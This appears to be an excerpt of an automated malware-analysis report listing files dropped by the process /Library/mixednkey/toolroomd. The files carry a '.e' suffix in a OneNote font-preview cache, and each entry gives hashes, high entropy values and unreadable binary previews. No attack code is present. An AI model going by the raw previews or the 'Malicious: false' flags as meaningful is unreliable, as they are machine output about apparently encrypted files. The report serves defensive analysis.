Preview:	.<.\|.....f.A..s)F.2....V.....>+..Gx,.i .Y.aY..~A%Fm.B`...!. .!.... ....O.4.. .....m../[....P..N.1...dg).y.H..N.g...u.B.hG...$d9.?..}&.^..dS,..I..\|.+g.?%o.?LY..IW11PHxgxA...}.K........N#...:..7..s..~..=.....;H.D.F.w.].....R.\D..W..(.6?.?.~.......5"..Of.....ny...u.....s..(.R6.....\.y..s.....@..DkDO....a4... .i.....z[6...x..@m&a...a~....R...YnF.tO..RB.&cD.-..1....l.!.....s.H.....`.......oE.\.x.f......-.E0..LpT..qL=N..w..wuv....1.._..pV.......3.x5L.38..U..:d.<.....YU=Q.".....G..@.u..u.f.c.8.....@5Z......I.+..ot.rl..".B .U.n.%..G.Tn.r.}D4.K.r.y:..b.....w.:s..`.V.....y...J..C.qK2..)^m.D.eT........?.....+^.....7F.r...Ft...?pzlL...._...T..}...Y.y]........x.........=.z.S.....S...?%o.?LY..IW11PI..\|.+g.h+@..6......D28...S..._.3..l.U....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Euphemia UCASRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1594
Entropy (8bit):	7.546169008452448
Encrypted:	false
SSDEEP:	24:EqK57uPIIrVD2r1GKAszO6hXqFh/AyynKbYx2F0iUIXfe0f3OrqyvmjVsePc0m7:E70PnRD2pGSzZh2hy4+t6XBfEdv8Npq
MD5:	852918A132CF494DCF44871F857B4D06
SHA1:	C97A5259245F45C08D24525160319D6D438E0366
SHA-256:	6FA67A17FB15E85838575FFF1B586EB0C58001AB4916A45E3E50D06DFB3DE455
SHA-512:	966B57B4C7DB1818B556DEAF48725C3D6510F2BD40DCCC0F378E0099116EBCF73E495DF4AB9ABCDA5D5A8DA59ED5CD8FBA7EF302CE78F337F36ED570132B2000
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a$4b..5.'..jP...ZS5Lf.....m....7.....x0..b....e...m.g..o]..C..Z..+ ..,...;.Ax6".K..F7...7.5f.....8..&..2c.N..M.....r...S.....v..8iO....rw].hD1.O........[.~.....U....S.).......Xg.(.....(.T......xdl.q..A.8.U...~yY.>>?....... W.w...8.......p.\|..f.:..f.....4.....YH .....,..............j....,.....Z.,.Q[.....(~4..3..D....BAD.7(..uh"..4....%..!h.Q.h..~X....L...@....?.FKZ.V.F.<M...B2\|.2........<N.._...<...C.W..)..U..{.......g..cK4G. .......].7....Sg...........<..4.Gw.....[....../.b..f..y....-.z....W.-...,[`..._s.M...#..Ra.[..w8..'.....M.........%...b....pg.k......A..Q....w'..(.GI.....d.x.v".d...e..W.h..,........j.N.T@.$...a.x.4Nv..3#....q.._D,..p{6..Au.v..!-j.5.....A.s.......<.E..J)}b....s...}............1...3.D5...+.Y.Y..f.&.b..UG...E~.r..,.?...O.'...\|W^...Y.;Vl,....I.c.zZ.......Y..R.}..F..B/.Q..n.(..tZ..^.w...)...=g.GQ..R..&..{..4....=Q!.e.....O....G....?..c).f..?-.N.h.d/.t...\._f...).

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.FangSongRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1386
Entropy (8bit):	7.429395916409372
Encrypted:	false
SSDEEP:	24:EKFn2CJUjhDTTBx9pvX1KA4wuj6cXU23bTXAHQEIBZDcsePc0m7:EKdAjhjHbvFKAk6cX1TwHj24Npq
MD5:	840B83D5083C754D742CE5B87086C362
SHA1:	0C8716703EA0901946EBB3D87B5932F8D5A58FE4
SHA-256:	DBEF1A936F625D44743B49D1115DB77276609BABFA9A366EA1F1D7F1BA8F4398
SHA-512:	5203CB00881D8A1E149C1F4240263ED8E91652A907D4D0E31FF9CFAB7EE2C6FAF5B6231428AE9ACA5770552E4F93A1122278DD7D5CD3131C49E9D5F25B4E1DD9
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..%{@....i.\|.s...K.@..._]9.?\|.....^.K..!.}..!B.mL.$..2.)U)'..v..>.....o.o}..(..t.r.E"46.....{...Z.g8...b.CY.+..{k.Z.......x..j.....?.#..........{....V...PK."C....xXU2-.JD4.........]...+.....G@....:b....w...>p.o&.0.H.V..-.,r....%j4. S....0..E.vE&[.=..%./.B..S..N.&.p)..../...K...j. .....o.E..`.O2.P........O3b.......AO8.TGi....p3#I.i.-$V+.\|ID.=3.a1...=t....e:.qbT..X[.G.m...!9...3O2...p..r.....a.}9R.b..7.......`(&l>Y...O.f...WDN..3d...0.A.3tIPYx...w.......^Y;V...ck.V..F..xB..f...R.u..E..70;'zr.g.R.g9ad1e....=O..@.8...<..Z.n..Q0e..h......SPe'.>{UJ.;.l.!.G..W.&.\l..R..\|.....f..P.N.4..T..P)...IJ...+....hS\q.:.].E..93..9..ub...2....lR....V....}...1....k.\|.<.~.`.'.5H.f),7.[>...D.v.`.34-.L.Nk./C.sd........P_..9\|%?..)......r.$...9.:...r4...e$e.0.7A..!k...9.M.....Y.}.....7Y..>...qy...3..t3x.....Bu..>..\|2..7...p...k.)..f..K..l.0....5n...33SoQ.L......kZ.....y .N..?....6$+.N.pw.X.5$.gzj.D-"!&..P.8

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.FontPreviewCache.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	466
Entropy (8bit):	5.738576665927574
Encrypted:	false
SSDEEP:	6:UqsLHINJvavZO6Jz29RTB6SQbveiHmH+BzsewLYHEec/LaqG8rQQwiQ/6:Ux6CvZB92t6SZ7ysewLYTc+qGm7
MD5:	9EEEA87C3444E4B7EC67FFFC4270CDB7
SHA1:	2DA7E5E51E9F892B7FC660C756253C0B77A257CF
SHA-256:	A368A0456C6A4CDDDE894A46474CB41C06AC897713EFF195C0C9977C331BCCBA
SHA-512:	8D2930A873800C30EE72E21536EA26B08AF9A9EE70B4B79EB8962C331D54F20A040FF944AFB7327C72D16BA6027610114329A4D5FFA85417E896ABB2E9399E02
Malicious:	false
Preview:	...a>k....'V\..sv.0........B....A-v7]V..0.....Y@{...\|kJ.R.~.K..........V....US+nB....W..x/...$...P.a.S@Du7.#.I...t..F.t<n....s.$:....1@6<.."a..W.i...<...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.FuturaMedium.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	946
Entropy (8bit):	7.103957496188966
Encrypted:	false
SSDEEP:	12:WvyOumfundXYoHegFRNkhlhn2/UQZkP1SeJV0LXYEPNIaXCxyniOGsewLYTc+qGq:EuRIoHkiUQuEmWLX5P2dxRtsePc0m7
MD5:	7C16CF2127D28EEDAB7BEAF112EBA71B
SHA1:	BB53DE7F99CCB593737BEF3E2631E7C11ACB6311
SHA-256:	6D62268172D18F7059163AB8F6A34072B0EB4E5009539E5316D11598D60B605E
SHA-512:	050A7CDC886FE7C2D98299DE1264BEFF279EC9A8387A28913164C52319F95754AE05A79B4798795043D1E0EA1FBEFAD54701D5F2CA19975B4BE7C38EE112B923
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..?C...?.m..&....0.BR....=.0._...Z.....}b...G.E....... a.7..[../...s..E...]J5dtS....M:Mn...j.v.?%o.?LY..IW11PVv.u.!..BC...n.w...u.!.....Y..../.g...8"./...G1..1.pG.^..s....#(r$.e...i.Y0t...........S>..K.SBI..!.j...?........S.z?E...Y.Y/f..7.@....G.C....EI6..W..2......;.^y...M.!.q:..m....;z.XZ._b..&_.Q)..gY~q.Q........d....3.g."....?....Xb.te..EO_..YY.dy......_.8.?..si.^X....5.:...7.M..:"..._. ..Sj.1fs..d..-u\,R.HC.<.L..~..b;-.%.a.....n..i7...../'.._.7H\.....e....q......Op{.........(......d>...]...Q#.3..8OU.n....K5....Yr_..IW11P.......;...Kt.,0.$j=%..e.-.!.%'...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.GabriolaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.410344614497139
Encrypted:	false
SSDEEP:	24:E4/zoYfC0lA7Rs+Y5uXGGTl3BUOXgTy3r/vLwX8qsFYsePc0m7:E48bahV5u2GpBrQTy3hFYNpq
MD5:	EBACAC996CC91678C71C02FD99606B70
SHA1:	948992C3CBDD5B0C395DD262C6E5590A691921EF
SHA-256:	E37347BB99CD4C6E83409667D92F177EDA7CA034720377A674A1502519C8F28F
SHA-512:	6D9CCF1D794C4A0E0A5AB0108B01ACA8FBA09C41917A7054092D68A4CA6EF448DCDE6121C01D6096D62D11DAAC1929CC93264DD94E9DC87CB607D2AB49C1E090
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.........q4...:E:.C.t..;6.. ..Sd..N.%....../.J.:..'..5.#.z.K..3.).h.1..h.W.9pG.7:'l.J.'.J.....g....G.L.JLd2mG...E..Q.O.-..Uj.._..m..+/3..l....T.B..W\|!.......A...>....y.ZP{({..$7.(..2G....'....S.?O..di.^..F....R..ZI.6...Y.5..+..f.TOX_....?..&...........CB.ha..d.>`.h.....H.......d.&....#D.z.f...q..-Q......=%.e........1=.'.Jng.Pa..\D..>.m.....:..A....SW&T..2.4..FG.>..1Q[...&i..-..h\|$.%..Z.l..r>....A...i...........tR...U........R]S...OD.%['...L...B..bs..Z.w.....r.....B.a.? ]JS..h..._.ty.{..yW....p....=.8I.05.Z9.qg....l.&.t......~:.'4.#.j..c..}...{.J...B.C8-.6$.=...s...,..<.=j..S....M.2D........P.:....<.....p7....&w..4..<....E).....N5~..>..x..2.'{G...c4LH.......w.....I...B.e. lF\|...k"1!.L.K..X..5f.-...7...=...&.......+.(h....o....wbMh...xe ...T....jf.(5R...]...o..uh...9..a.."..q..I....B..;?.V....{.+h5..q..V5a.<y.&.]Ds. ...9. )...].oNbc.s6^......J...~:./\K1...0.ib.}-......'.Im^..W.`.a...hy.f.awfh;...

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.GaramondRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1442
Entropy (8bit):	7.46128760855509
Encrypted:	false
SSDEEP:	24:E2QADDz+F5cqey14VUGTiioc7eVQRaQngP+27KMNGbPx1sePc0m7:EfADDg6a4OGG5A6QR9nk+2GMwjNpq
MD5:	B569F61BB450562BF8D549EFC84966F0
SHA1:	8C86188B168035EC75225C6F9FC508FA5C7B8E1F
SHA-256:	33C0F9725067E8616502BDE0A59198AFDA27915F2802F42A2769E62E9C8ECBC1
SHA-512:	B8FC129C9E977CB740137F28204FA027AA88696094ECE1157D525A6CA7CD6329AE824C4EB0F0575180F2A24A930B51A9DB3435D05DAF51AA623E7364589E0C83
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.$Z...Z;.J6.\|.....t.....t..S./.&\;..W.j...i#X...-.........5s.X..&i.L..V....2.Q.\...6...sY).U..5<2@..7..[)4.....qP.#..........i.6\|.8....Z..iF.qa.......D.h.....S.yB..s.....z....E.l.=.v......$N...4..Rc.....09I4i.:....<u..N..>....&.......R.v.c~ ..5z.\..FS.aa.S.......'S^1..."W&...RL.]...+.l}..K01Or......!h...SOh3...!.u.<..#.J...9.i[?D.x.Dx65.s$M..#..L....>...`L..D.^-Z..9.M..W.......J..Q....d\|NZ~<........{.:.=.mO.........(.-...pG..?....d.f...Z-..HR%D....k..u.p.V.....m ..K...9....&.T...9.a..:M.{.a.w .?........G.!nM.d/4..~gP3...R..$n..QV.....=R7....".......-..[.6......A...1.\....$M7nS..v.._.......<2..l..1.]..%...D.7..T......(..Y..+n...A.........}.>.t~.F.bh4..5'o...L.c......uW.n.@.:...l..1..8#...1$..9J=...0.?.....cX`csFY.\|t~)..=cXe...:.:'.W. e......[G...N....-E4.{.9I...6..^..#Z.g.q.s=.R\|...7....D....o...p%...n....`......]j\|..Wl..G....b..13.>.0.k2.RJ.u.+_........C.B......z.. .~3H....^..A...*...

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.GautamiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1290
Entropy (8bit):	7.399554294569819
Encrypted:	false
SSDEEP:	24:btHB6/sNnUkVN1N/ojdvUnngi6OiTKNFpM25hdsePc0m7:bth6UV//oNUoZubpMchdNpq
MD5:	EA0A52832500B64895B763947E598FA5
SHA1:	7B620131F5EDA035F3CE7AB4F9B0922E46CEAAC1
SHA-256:	94C6028ADA44CA4803EBC916033F76DF02ECB5D89FBCE6E53132C599004DC17F
SHA-512:	1B43B71B17037CB3609E274B421F38B7D90EFAF2016DECE96ECC33127903120D84968CAB319C6830D8321E65AEF6CAAD1185FC309BDF2AA4273FDA2E6A002940
Malicious:	false
Preview:	.<.\|.....f.A.........?..c..F.u....'.i .Y.a...].......u.D.{.d[.....]...].14...5..L..=...y.S.s..dY...w/.....+8R...._%./.CD..9w.y..CcI.....).Y'za.(V.u;..(...{.XBzt..K}.&.^r..........W....$.i..V..K.........Mm...J!/L.......R..z...W..Q..q..\.#.....z....-Dc<....W...%Od\|...SR....t.\|....OL...$.....mR.y[.\|.OL......c.."...^...I.. h..Z..+0n..PP.W.......U.x.}.6....2n..o.#e.XB.r.\.......wnoa..e....P...[......EP..7.e...M.:c....C9.Y3..V.q...4.K....,?)...E...Up.l.......wo.._&!._.FWW.P.o6........6.<.W..4...c.P....!.......uD.k..4....M+...]..XJv$......sK.eA..."v.....h.OK...\|9.......8lW.......T@.d...L...?+wt.A.d...E....N...8....' a.AZ......jYUiz~r\@.K.l....:.S..0b......-.Ub..7Q]..I.+..~.J.F......-....s.8.4...:.......FP.#....;$.../h...1B.7....lW....8..J.../.l-..nF.Q.EOI...xq9.b\.P..#..;.4.H./............L..K....(&.(.Q.4.m....../.8...+h..*...[...C'.9[.....\.!;..X.!.A.y...@..i.#Y'za.(V.u;..(...{.XBzt...s...c>..nicidK...JCpg......................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.GenevaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1242
Entropy (8bit):	7.393642710531161
Encrypted:	false
SSDEEP:	24:EmIk9nXZJNcLwixTsbL5wBRptyWm5ee00zbMtrkCOVsePc0m7:EinTNcnlsvIPtyWm5ee9bMtrRGNpq
MD5:	A76997E2411B8A5A14C39FC1D95D0B81
SHA1:	B1F2E637A986F3E33DB00B4DBFEAAC6388B02C43
SHA-256:	D22A15EF8770FA0D57BE8BE189EB11A69D2A74B90EAFC8F3EAF8BBAD0727A485
SHA-512:	4B25AB6470DD334A2C8FBD3AD99E97EA492DBF08A24775A454C8D9CFE838D35CB233428E24B6AE8A0419EF1DDF60F6531348A56A73B27AC306335341D971A825
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aEr-.q>.:.e....\.ULp.'H........z.i`.\|q./.V$&]q"............wB@~..8...y. ........;.K0.t.D...E^Z...).n^...w...H...n.keA.j.S.S...H..hO..z_.\|.Fk._..cS]R.@\?.....rQ..w.+....$...(G..{...L.-K@..xp........=l)..."....t..q.)...l...../L!.n...(..#=...\x..._b.z....\|....6S....5a..J.x.....C..~.-.2v.n1..ivv.v)#\....-pt...\|n....\....O.t.u........$AW..........Fg\....#^......\....\|w.cF.0.?..2O...Q..b5.u.h(G..mZ.....pZ..^.V...fI.W%..-.l.J.)b7M.H.....i........m.W....O.\|..zf../4.!....XT..7...=......t....5..3U......6.%...GI...N.vr.sC..(....Ew...qO....fW....a...F%.k3%H`...;J..(2.Q..Wi{.5.iO..8.QR.l.>.q...k.%.Y..w.x.d.o./.#mG...}x..u...=0..u'Y...^$9j`.v.0z.a...&....G..L...G.l0...lD}.N...\5.]..4t..V.y.`+..]..G..X.i..h.....y.......cX.t........[j.....}..c..NM.nu.T..2,....w.$iE.r'}.-.W..@`..2.},-....1B......J..j/.K}.&.^r..0.%.......W..u.p.h9....S..._..P,%."...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.GeorgiaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1338
Entropy (8bit):	7.420486769029289
Encrypted:	false
SSDEEP:	24:ELEiwYADfHnjHSQd9h5s9gVFJv5jp0Dgkf5S6VLrplc2ssePc0m7:EGxfHnjx93JRiDrhPVnpl+Npq
MD5:	3BD63F04E91C30245BDAE0F6C065C6B6
SHA1:	48FF57B8FDFE1FB31734EF26C3F9BCA322EF16F6
SHA-256:	82495629DB23D744656E03D4D86E8C1698B15992AD3735FA88E74E7FDCF69A75
SHA-512:	C13BF605F66F23C598B10AC5FA7ED9F5C37A9070D1AC6F9E5004D5614FFFC185CFD9241DE2DEDCB102811830448483AFA2681135037662A7F8A01EF8C68DE3BE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..%.=O..J..};..Q..k.ik..YD.o..<S.G..D6.4...xe~...i.P....Od..fhx4.w..-.#.6}=~..7,...Q.[8.8a%TY....?.....s...g.d....[F~....[MfK+....X............4.J.)B.4Y.7.;...;..5.g.i....#......J.~..[c....,..)...........=<....Dc...p.Hi..%.3....$..dd.V..,...SK....'../nW9w.e....A$jP..X....[./....+........1.i".....52.g..J.I.ydu......T..8QI."..m..........e7.......Y-.H..w.nK6..........s......I.5....L..L...E.f....#..p..t_vX..G....&C..h........}....%.eK"..}.........&]7K....?......!.L..S...e..H..lh1..@....n..)..a.....%.w...E.).{D.'MR2C.^(.Rm.......W......'..X...JX.f..Br..S.8=;#\.....P..Io...I...D...SI.....w.....jdYh..P...#J,<G<t.x.V....T.95.u.....ny.=.5..\|).....}.a...X.'E7q&T$..#B.np8.+x..&R...4..A....\NA....0........./........iP\|.;.1.&zDA,.).'..I..U..0...{v.Hv.[\.u....u...'a#E\|..Z....N'.E.L.v1..hG......7..E.8G....e.d&.8.....x......Wy.."C..7u...e.>.]..U..r....0.....E.a>.....Z....\.{P:.).)${.J...J..:*,.\.....NGK{..\.&...G..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Gill SansRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	7.399746741569973
Encrypted:	false
SSDEEP:	24:EZxVnfmsCjFxs1ToqcNioMpo6jWieYH0Q51dnK25V2rtYsePc0m7:ERmskXs1sqsPKo6/e2351dnKEYiNpq
MD5:	6A6678EBDC1B1EB1DDA251742299B8DA
SHA1:	4830D3A04F3EBBA09EF0F8317D73C59235C0CE93
SHA-256:	E9B29CB05140436B6674120860AADA0419DB5B2FCBA9E0C2728AEFD3EC6C3447
SHA-512:	74C6777FB15E9D8929E05169208415AD84919EBFACE4B41F8E690ED715132C1C7C252EFE15760778A7627C9050441036FCF90BD9D80ECA48866E83D6A7E9CE5F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a2..Gj.wm.i.\|.s..x;m....].%...D....a..;....S.c...l..Sf....q....9..m\|...4F..O..L........Y...#._n%i.[...x..,.&.K..r.d.T\|z..t.5j.u/....y...MN...:D(.U......~0.......?dX{XA...A....)Q....'A"P.....gR./F.V.J'..}7.Dp.K...ad.t..$..K4..^...N.S.P..S..T.Z.."..v\|...#.oa.f...%...$....RM....Q=..kM...W.>o.!.4...,-..e.,vjy.K8...?.jP.Q.=Bx..=XvD...g.0d..U.L.V.7.......~..=...C.N1...Px..g...P.:h...O...v.b.....S."............WpP.D,....p..}$L..1...;.P..mQ.A.a.I.k......!$:T..t9...).8^.=..V@'Y.==.9..y.LI....L.f.Ip~T..\|.\....R`g`.z.)...S.qN.;eI..w=n.:!......~)...3#V.Q0K..-G.H... "......:.&...b.E...$F.Z..s......t:........?{l0....O.>........F...5.XMb.....By..#.6.!..^.<.Jr}&$..(..x..xX.Z.O....+....S2.e:T......'.:%...Fl.2.(U......,...(..n.k.5s9.X3....._...&r.u,...A.......$...v.u..b..`.1.........dZt.........aT.G.&..f..\|...L..{e.w.v.c.R....Q.].W."....g9..+......Vf....)...Hz.qN...Z.k.<.P....%.&W..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Gujarati MTRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	7.483773028513389
Encrypted:	false
SSDEEP:	24:Yu0psY0at1kFqPQDGiujS0+FpJHwWhMGXVTnjNsLD7c5uZhAsePc0m7:YuGsyt4tCiY9IpJeGXVTjN4DBYNpq
MD5:	40689F2C0A2975E2A81714004AB61803
SHA1:	E0889541BF63BCB15C9BD7E43763078C29719305
SHA-256:	50FCDD092C336C9811BCFF83B26313BF0B45B78FA15CB4E0C2921BD0C0D59324
SHA-512:	2AE11D0DEF1C5F8AB00FDBDB334B72A3E266EDA01276839BC602EBF153C685734DE81E17A772A9AC541F797D768A558F7212923B5ED9F38B1DA12C9D75584E06
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.aF..."1...6.."..r#.A.K..=v....LXc.0d.0..o<..y..&m@?.....I.<A7}...1Doe............s.v.......%.E........^6..S...lR.l.e._..6.........b.m. .Pb.....nf!T.5J....4#..sG..Q.....`].ra...w.f.A.s]..H.K7....MV[,........Ml.o.U.U.......Y.A.8..d...V4a..iJ.yq....f.T%i.V.j..c...O<I.#7...&..Rv....g5..&.L..=.....s...y.9..Q....f...^U....fS.,/...u.[_.....-....`..ks.^...-<..m.....C.u.&.C4,...f...e4.......#d......U '8.....^..v../.;..Z.....;.P.:.1........d.OEF...b.47......g&m...t..z..h..:...WK~/..Le....7.1....?yl."1.:U..p..-.i.L.T...e(.LXR.d..JI..N.G^/..H....$e......Dh............-..{O...W........0..x.....6........S&}.z...v....5...03%m...b.5.A.>..@g.!...i.Q.K.?.'Yg...A..S.+........\).D..)~9..........e.....8Pc...Df.j..OCH......6,I..2.M.m.....{+..,..a'..=.%....ST.,.....a..K.v....Q.....nl.%......I.H....?..Gm>.Ei..J*GM.;u.AS..I`.5....F...S....[Na"93.=B.W.<P....K..6..$. .`.c...I.n..8....n{.....M.....P3.DW.E5n

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Gujarati Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2034
Entropy (8bit):	7.646001144151348
Encrypted:	false
SSDEEP:	24:VaHCGR/KHuHd74BsOQyJVql/7wRVodXSnUKaz5KzYgmqQrk0mwMtQhNUVsjLViCu:sHFKO9MBs7ic7odnUKI5ZNIdw6VorNpq
MD5:	99C14F713F41CD57A103318BB1C842F1
SHA1:	3AE966757BBBD9CF82847A10058C79675C8B4DBB
SHA-256:	7F63CA2C891AD04530CD285AFDACF35D7518F0D44F451B1EDE505C60A7DD60A8
SHA-512:	29AD5A1A1D61A15370D7071C8C5C27539F636DD7D2E52E540356201BF27319A47616BDE030699FDE5B14B0E047FFA2F6DFA200CBF5DE8B79490D99ED6A588A1A
Malicious:	false
Preview:	.<.\|.....f.A..1...N#. ..\.L.@..4-F+`..i .Y.a.............H.$3m.>...h.{i%.2....m&x/...2.43..5.t.x....`.v...~....r.@a.V...VWOhZ..qI_.c.V.I.(d....I.(d....I.(d....I.(d....,.c..!E.Xx..`n...>..m...K'.v/...x.(.....S.).....0...~M=..f}3u.;'.v.J.3?A..?....?^V.....@..W.j\|B.C..y..u...a.R...7......gT..H.........!.0..Y%\.;.?%h..X..el./..........V..\.,@_.iG....S..OTm.S#.....j...^.<..??..9g..A..%....=.l....... ..N..X..b!...-......q...~.j(...d...J....S0....].}4.f%.N.......[..K.1...d'.......:T.2....r...O_..J...q.6a.......J..w....3..LP-..'..[k..<.T..E%X\|..Q[2.Q..q.;z.2>...2 ~..,i2p.rk....j/..4X.f.d>..3?.B.y...\|.&...c.....{\|..O..`...m..#LB.C..._.Sm0...H...8.......u...p..Q..(...n....T.t....F0Bdg..5.K=d...k.._....S...p;..lU.K...K..)$....Ss..a!?v.zFx.a.........)`-..S.U.!.........N].,8..(%.f..#1%[..t.`..Jr6ss.....%....Y.\|4....V..t..O..!.....n.0..ZE.7.h...]..._.@.cP.....Z...1...A..<..T.f}Wa...FG.9.Dy.....y....Z..T>8Rr..."..t.......p.3H.J..E....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.GulimCheRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1202
Entropy (8bit):	7.341632519038111
Encrypted:	false
SSDEEP:	24:Eclj9263y/gRU5j01mSXO+6Z62D5o7tdddND88wR6WksePc0m7:EclRJWSkjEmSXOWOglQv6WkNpq
MD5:	09D5E0E9CB40D4F3574A83308FBD3FB9
SHA1:	BEEB06AAD3B271F80E311AF1DF5BA4F7F50234BE
SHA-256:	AFACF4B34CC2D6DF7408706E75251C71A635711EE1E9F1A6344A2CA3046E9AB8
SHA-512:	9E2523F8F9251D95692AD5DF6F06F08ABFB2B188D8FA71472FB091BA8A36784BE5FA7ABA0284E552DD2B5AC8074169945F9D354A2CDF1167AD6CE471ECB8D933
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.<.BL..E..P&.~...4..wK......:I......[aL1....._t.J7.N...}..E\1.].1k.50..X.M..%0.D.....K...k.+...i...Z.m.b..>.....m.U....iG..$.W$.V.(......G.0..D..RS...i..a.w..D,.?..t.g.......\...=..g.W...Bf..!Z.tT....n.....=2p2F..V.`..o.Y....55..90.}.S\|.\|........).fy.........;...........hu.7..3zx..K...a ..iq.g..3....d..+.1_..#W\.0..[....:{d....../[......9..ScJ.0o."7.}.......2>.r...Vf....Bml..{.wM.yu...".KM...jxB.F..1..T.`...xG.T.A.M.....8& .M.b..w.M.<.....W...qR..B..@.9....%..../...A..6BS.N.q.1\|..!/..H....0...<E.mD}....j.Dk{j.......`.`.%...UM.s#.Z4m.;.`..J.lS.Zh.Z.....SU..r...G#...."7....F...<.....v.....`.Z$f..).Y.nm.k.c........,f........-....c3.Y......]B...;...!!....,..5g.....r.W.....u.....EZ..........+...%a..h.\....>.\|..20..\%/....Q..8+.#.C.hJ.I.kX.....[.....h...<......n..gP.!B..`.F .A.7.G`.........J.\-.3...q.[...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.GulimRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	7.125580045274756
Encrypted:	false
SSDEEP:	24:Ex8Hq5p2CuKmAh5nB+CK+PpTn3feaDF3zyENsePc0m7:Ex8K5pjui50R+RTnPbVNpq
MD5:	0E396916D012E3FD3EF8D5A663A13966
SHA1:	8286C44830757984088440ABAE9FE039ACF69A6C
SHA-256:	10E7208EF9C953AB348EFC19292C5F91D4A54C42EE67B6317A69A48C94B99CFA
SHA-512:	FD169F59F4C32F527CCB786EE303905F114B11225724F97A40A7ED0FDE3A83CBC470309CE7F769ECD52A86299D7D277ACA90985760605FD86841F5713F4FFC88
Malicious:	false
